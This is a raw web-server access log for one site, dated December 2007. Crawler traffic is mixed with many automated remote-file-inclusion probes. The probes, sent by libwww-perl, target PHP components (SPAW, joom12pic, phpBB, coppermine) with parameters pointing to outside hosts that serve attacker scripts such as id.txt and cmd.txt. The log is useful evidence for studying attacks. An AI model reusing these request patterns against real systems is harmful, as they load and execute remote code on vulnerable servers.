198.54.202.226 - - [15/Dec/2007:04:07:19 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.54.202.234 - - [15/Dec/2007:04:07:31 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.25.255.194 - - [15/Dec/2007:04:07:33 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.108.148.233 - - [15/Dec/2007:04:17:55 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.dmulk.com"
75.108.148.233 - - [15/Dec/2007:04:17:56 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.dmulk.com"
75.108.148.233 - - [15/Dec/2007:04:18:02 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/presto/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.dmulk.com"
74.6.23.35 - - [15/Dec/2007:04:25:42 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.45 - - [15/Dec/2007:04:25:42 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.105 - - [15/Dec/2007:04:26:18 -0800] "GET /logs/access_071017.log HTTP/1.0" 200 21727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.167 - - [15/Dec/2007:04:28:38 -0800] "GET /logs/access_070923.log HTTP/1.0" 200 55220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.77 - - [15/Dec/2007:04:29:24 -0800] "GET /logs/access_070929.log HTTP/1.0" 200 98605 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.22 - - [15/Dec/2007:04:35:01 -0800] "GET /logs/access_070913.log HTTP/1.0" 200 105654 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.160.16.207 - - [15/Dec/2007:04:35:10 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.16.207 - - [15/Dec/2007:04:35:21 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.16.207 - - [15/Dec/2007:04:35:21 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:04:37:32 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:04:37:33 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:04:37:33 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:04:37:33 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:04:37:33 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:04:37:33 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.54.202.210 - - [15/Dec/2007:04:42:27 -0800] "GET /logs/access_071202.log/admin/editor2/spaw_control.class.php?spaw_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.54.202.210 - - [15/Dec/2007:04:42:28 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.25.255.195 - - [15/Dec/2007:04:42:29 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.231 - - [15/Dec/2007:04:53:30 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.203 - - [15/Dec/2007:04:57:54 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.73 - - [15/Dec/2007:05:12:24 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.11 - - [15/Dec/2007:05:13:04 -0800] "GET /logs/access_071030.log HTTP/1.0" 200 28194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.25.255.246 - - [15/Dec/2007:05:18:47 -0800] "GET /logs/access_071126.log/admin/editor2/spaw_control.class.php?spaw_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.75 - - [15/Dec/2007:05:19:12 -0800] "GET /logs/access_071119.log HTTP/1.0" 200 21994 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.146 - - [15/Dec/2007:05:25:37 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.145.194 - - [15/Dec/2007:05:26:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.194 - - [15/Dec/2007:05:26:10 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
67.15.10.71 - - [15/Dec/2007:05:36:48 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:05:43:16 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.136 - - [15/Dec/2007:05:47:51 -0800] "GET /logs/access_070925.log HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.168.39 - - [15/Dec/2007:05:49:56 -0800] "GET /logs/access_071202.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://epics.ecn.purdue.edu/lsc/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.168.39 - - [15/Dec/2007:05:49:56 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://epics.ecn.purdue.edu/lsc/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.168.39 - - [15/Dec/2007:05:49:56 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://epics.ecn.purdue.edu/lsc/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.10.71 - - [15/Dec/2007:05:51:19 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.10.71 - - [15/Dec/2007:05:51:20 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.168.39 - - [15/Dec/2007:05:57:57 -0800] "GET /logs/access_071126.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://epics.ecn.purdue.edu/lsc/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:06:07:50 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:06:07:51 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.190.51.202 - - [15/Dec/2007:06:08:26 -0800] "GET /logs/access_071202.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://epics.ecn.purdue.edu/lsc/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [15/Dec/2007:06:08:26 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://epics.ecn.purdue.edu/lsc/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [15/Dec/2007:06:08:27 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://epics.ecn.purdue.edu/lsc/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.230 - - [15/Dec/2007:06:09:36 -0800] "GET /bikes/?N=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.10.71 - - [15/Dec/2007:06:14:46 -0800] "GET /logs/access_071126.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.75.35.118 - - [15/Dec/2007:06:19:30 -0800] "GET /logs/access_071202.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [15/Dec/2007:06:19:31 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [15/Dec/2007:06:19:31 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.43.236.7 - - [15/Dec/2007:06:21:53 -0800] "GET /logs/access_071202.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.43.236.7 - - [15/Dec/2007:06:21:53 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.43.236.7 - - [15/Dec/2007:06:21:53 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.19 - - [15/Dec/2007:06:23:39 -0800] "GET /logs/access_070829.log HTTP/1.0" 200 34921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.190.51.202 - - [15/Dec/2007:06:23:42 -0800] "GET /logs/access_071126.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://epics.ecn.purdue.edu/lsc/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.35.118 - - [15/Dec/2007:06:30:56 -0800] "GET /logs/access_071122.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.118 - - [15/Dec/2007:06:33:54 -0800] "GET /logs/access_071013.log HTTP/1.0" 200 46816 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.43.236.7 - - [15/Dec/2007:06:34:42 -0800] "GET /logs/access_071122.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:06:34:58 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:06:34:58 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:06:34:59 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.16.207 - - [15/Dec/2007:06:35:16 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.16.207 - - [15/Dec/2007:06:35:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.16.207 - - [15/Dec/2007:06:35:27 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.16.207 - - [15/Dec/2007:06:35:27 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:06:35:33 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:06:35:42 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:06:35:43 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:06:35:43 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:06:35:44 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.29.24 - - [15/Dec/2007:06:38:21 -0800] "GET /logs/access_070927.log HTTP/1.0" 200 42324 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.200 - - [15/Dec/2007:06:42:45 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:06:46:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:06:46:12 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.104 - - [15/Dec/2007:06:46:26 -0800] "GET /plans/?N=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.53.51.119 - - [15/Dec/2007:06:48:16 -0800] "GET /logs/access_070712.log HTTP/1.1" 206 114624 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
206.53.51.119 - - [15/Dec/2007:06:48:17 -0800] "GET /logs/ HTTP/1.1" 200 25820 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:06:48:40 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:06:48:53 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [15/Dec/2007:06:49:14 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.37.173.162 - - [15/Dec/2007:06:49:41 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 25820 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [15/Dec/2007:06:49:42 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.60.72 - - [15/Dec/2007:06:51:10 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.18 - - [15/Dec/2007:07:03:48 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 12137 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.216 - - [15/Dec/2007:07:04:11 -0800] "GET /logs/access_070920.log HTTP/1.0" 200 56600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.148.232.33 - - [15/Dec/2007:07:09:53 -0800] "GET /logs/index.php?subpage=http://d3c0d3r.altervista.org/hide.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
72.29.87.145 - - [15/Dec/2007:07:14:43 -0800] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIRhttp://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
72.29.87.145 - - [15/Dec/2007:07:14:43 -0800] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIRhttp://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
65.55.209.204 - - [15/Dec/2007:07:17:35 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.204 - - [15/Dec/2007:07:17:35 -0800] "GET /logs/access_070829.log HTTP/1.0" 200 34921 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:07:33:03 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:07:33:33 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.9.75.244 - - [15/Dec/2007:07:46:21 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-misfits.com/fixed/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [15/Dec/2007:07:46:22 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-misfits.com/fixed/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:07:52:31 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
143.248.135.48 - - [15/Dec/2007:07:52:32 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.webmasterserve.com/impex/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.7.123 - - [15/Dec/2007:08:01:30 -0800] "GET /megumi/Bracelet/ HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.36 - - [15/Dec/2007:08:02:06 -0800] "GET /logs/access_071115.log HTTP/1.1" 200 56806 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [15/Dec/2007:08:02:11 -0800] "GET /logs/access_070710.log HTTP/1.1" 200 32027 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [15/Dec/2007:08:02:11 -0800] "GET /logs/access_071017.log HTTP/1.1" 200 21727 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [15/Dec/2007:08:02:13 -0800] "GET /logs/access_071010.log HTTP/1.1" 200 39814 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [15/Dec/2007:08:05:24 -0800] "GET /logs/access_071103.log HTTP/1.1" 200 57650 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [15/Dec/2007:08:05:24 -0800] "GET /logs/access_071119.log HTTP/1.1" 200 21994 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.94.99.246 - - [15/Dec/2007:08:05:55 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.246 - - [15/Dec/2007:08:05:55 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.246 - - [15/Dec/2007:08:05:55 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.10.114 - - [15/Dec/2007:08:05:56 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [15/Dec/2007:08:05:56 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [15/Dec/2007:08:05:56 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.99.246 - - [15/Dec/2007:08:06:20 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.10.114 - - [15/Dec/2007:08:06:25 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.112.28 - - [15/Dec/2007:08:06:56 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cbe.kaist.ac.kr/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.112.28 - - [15/Dec/2007:08:06:57 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cbe.kaist.ac.kr/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
